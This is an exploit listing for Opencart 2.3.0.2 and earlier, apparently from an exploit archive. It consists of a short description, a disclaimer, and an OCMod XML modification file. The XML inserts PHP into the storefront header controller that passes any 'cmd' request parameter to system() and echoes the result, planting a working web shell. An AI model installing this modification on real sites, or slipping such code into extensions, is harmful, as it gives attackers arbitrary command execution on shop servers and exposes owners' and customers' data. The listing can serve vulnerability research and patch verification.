Opencart 2.3.0.2 Insecure OCMod Generation Remote Command Execution

Opencart versions 2.3.0.2 and below suffer from an insecure OCMod generation remote command execution vulnerability.


MD5 | 6fe443a1799c4db7980052fb9c608ef3

<?xml version="1.0" encoding="utf-8"?>

<!-- Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE -->

<!-- Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> -->

<!-- Disclaimer: -->

<!-- This or previous programs is for Educational -->
<!-- purpose ONLY. Do not use it without permission. -->
<!-- The usual disclaimer applies, especially the -->
<!-- fact that Todor Donev is not liable for any -->
<!-- damages caused by direct or indirect use of the -->
<!-- information or functionality provided by these -->
<!-- programs. The author or any Internet provider -->
<!-- bears NO responsibility for content or misuse -->
<!-- of these programs or any derivatives thereof. -->
<!-- By using these programs you accept the fact -->
<!-- that any damage (dataloss, system crash, -->
<!-- system compromise, etc.) caused by the use -->
<!-- of these programs is not Todor Donev's -->
<!-- responsibility. -->

<!-- Use them at your own risk! -->

<!-- NOTES: This file must be - oc2302_preauth_rce.ocmod.xml -->

<modification>
<name><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></name>
<code><![CDATA[Opencart <= 2.3.0.2 Insecure OCMod Generation Pre-Auth RCE]]></code>
<version>1.0</version>
<author>Todor Donev</author>
<link>mailto:[email protected]</link>

<file path="catalog/controller/common/header.php">
<operation>
<search><![CDATA[// For page specific css]]></search>
<add position="before"><![CDATA[ if(isset($this->request->get['cmd'])){
echo "<pre>";
$cmd = ($this->request->get['cmd']);
system($cmd);
echo "</pre>";
}]]></add>
</operation>
</file>
</modification>

Related Posts